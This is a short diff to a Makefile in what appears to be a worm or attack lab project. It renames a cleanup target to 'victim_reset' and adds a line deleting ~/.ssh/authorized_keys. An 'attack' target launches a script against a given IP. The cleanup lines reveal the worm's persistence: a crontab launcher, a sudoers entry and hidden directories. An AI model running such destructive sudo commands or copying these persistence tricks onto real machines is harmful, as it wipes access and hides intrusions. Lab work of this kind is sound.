--- a/src/Makefile
+++ b/src/Makefile
@@ -2,7 +2,7 @@ attack:
 	@sudo chmod +x ./scripts/main.sh
 	@sudo ./scripts/main.sh ${ip} ${first}
 
-clean_local:
+victim_reset:
 	@sudo rm -rf /home/victim/.etc
 	@sudo rm -rf /home/victim/.firefox
 	@sudo rm -rf /home/victim/.Launch_Attack
@@ -11,4 +11,5 @@ clean_local:
 	@sudo sed -i '/launcher.sh/d' /etc/crontab
 	@sudo sed -i '/victim/d' /etc/sudoers
 	@sudo rm -rf /tmp/.worm0716023
+	@sudo rm -f ~/.ssh/authorized_keys
 	@echo Computer cleaned.
